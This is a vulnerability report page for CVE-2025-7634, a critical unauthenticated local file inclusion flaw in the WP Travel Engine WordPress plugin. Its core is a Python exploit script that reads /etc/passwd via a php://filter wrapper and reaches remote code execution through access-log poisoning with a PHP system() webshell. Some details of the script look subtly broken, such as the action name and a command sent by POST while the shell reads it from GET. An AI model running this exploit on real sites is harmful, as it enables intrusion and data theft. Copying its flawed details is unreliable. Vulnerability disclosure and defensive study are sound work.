Security Vulnerability Report
CVE-2025-7634 CVSS 9.8 CRITICAL

CVE-2025-7634

Published: 2025-10-09 06:15:37
Last Modified: 2026-04-15 00:35:42

Description

The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.6.7 via the mode parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Travel Engine <= 6.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-7634 - WP Travel Engine Local File Inclusion PoC
# Vulnerability: Unauthenticated LFI via 'mode' parameter in Ajax controllers
# Affected: WP Travel Engine <= 6.6.7

import requests

TARGET_URL = "http://target-wordpress-site.com"

# The vulnerable endpoint is an admin-ajax.php action
AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"


def exploit_lfi(target_file):
    """
    Exploit the LFI vulnerability by including arbitrary PHP files
    via the 'mode' parameter in WP Travel Engine's Ajax controllers.
    """
    # Action 'wp_ajax_wpte_filter_trips' or related action triggers the vulnerable code path
    payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": target_file,  # Inject arbitrary file path here
    }
    response = requests.post(AJAX_ENDPOINT, data=payload)
    return response.text


def exploit_rce_via_log_poisoning():
    """
    Achieve RCE through log poisoning combined with LFI.
    Step 1: Inject PHP code into access log via User-Agent header
    Step 2: Include the access log via the LFI vulnerability
    """
    # Step 1: Poison the access log with PHP code
    log_poison_url = f"{TARGET_URL}/index.php"
    headers = {
        "User-Agent": "<?php system($_GET['cmd']); ?>",
    }
    requests.get(log_poison_url, headers=headers)

    # Step 2: Include the poisoned log file via LFI
    log_path = "/var/log/apache2/access.log"  # Adjust path based on server
    # Use PHP wrappers to execute commands
    rce_payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": log_path,
        "cmd": "id",  # Command to execute
    }
    response = requests.post(AJAX_ENDPOINT, data=rce_payload)
    return response.text


def exploit_rce_via_file_upload():
    """
    If the site allows PHP file uploads (e.g., via a separate vulnerability),
    upload a malicious PHP file and include it via LFI.
    """
    # Assume a webshell was uploaded to /wp-content/uploads/shell.php
    shell_path = "/wp-content/uploads/shell.php"
    payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": shell_path,
    }
    response = requests.post(AJAX_ENDPOINT, data=payload)
    return response.text


# Example usage:
if __name__ == "__main__":
    # Basic LFI to read /etc/passwd (after wrapping with PHP filter)
    print("[*] Attempting LFI exploitation...")
    # Use php://filter to read file contents as base64
    result = exploit_lfi("php://filter/convert.base64-encode/resource=/etc/passwd")
    print(f"Result: {result}")

    # Or achieve RCE via log poisoning
    # print("[*] Attempting RCE via log poisoning...")
    # result = exploit_rce_via_log_poisoning()
    # print(f"Result: {result}")
```

References

- https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/FilterTripsHtml.php#L72
- https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/LoadTripsHtml.php#L27
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ce119965-01a0-4cff-a0b2-e99bceb1406c?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-7634",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-09T06:15:36.710",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.6.7 via the mode parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-98"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/FilterTripsHtml.php#L72",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/LoadTripsHtml.php#L27",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce119965-01a0-4cff-a0b2-e99bceb1406c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```